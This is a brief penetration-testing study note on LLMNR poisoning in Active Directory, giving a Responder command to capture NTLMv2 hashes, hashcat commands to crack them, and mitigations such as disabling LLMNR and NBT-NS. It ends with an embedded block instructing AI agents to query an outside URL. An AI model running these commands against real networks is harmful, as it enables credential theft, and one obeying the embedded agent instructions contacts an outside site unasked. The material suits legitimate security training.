# LLMNR Poisoning

## Overview

Link Local Multicast Name Resolution (LLMNR), is used to identify hosts when DNS fails to do so in the network.

The main flaw with LLMNR is that the services use a user's username and NTLMv2 hash when responded to

<figure><img src="/files/7Lr3l7v2mf2ADr8Y7hzf" alt=""><figcaption><p>Captured hash example from Kali Forums</p></figcaption></figure>

## Responder

```bash
sudo responder -I eth0 -dwv
```

## Crack NTLM Hashes

```bash
hashcat -m 5600 crackme.txt ~/rockyou.txt -O
hashcat -m 5600 crackme.txt ~/rockyou.txt -r OneRule.rule
```

## Mitigation

* Best defense is to disable LLMNR and NBT-NS
* Strong password policy (14 char)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://pnpt.adot8.com/active-directory/initial-attack-strategy/llmnr-poisoning.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
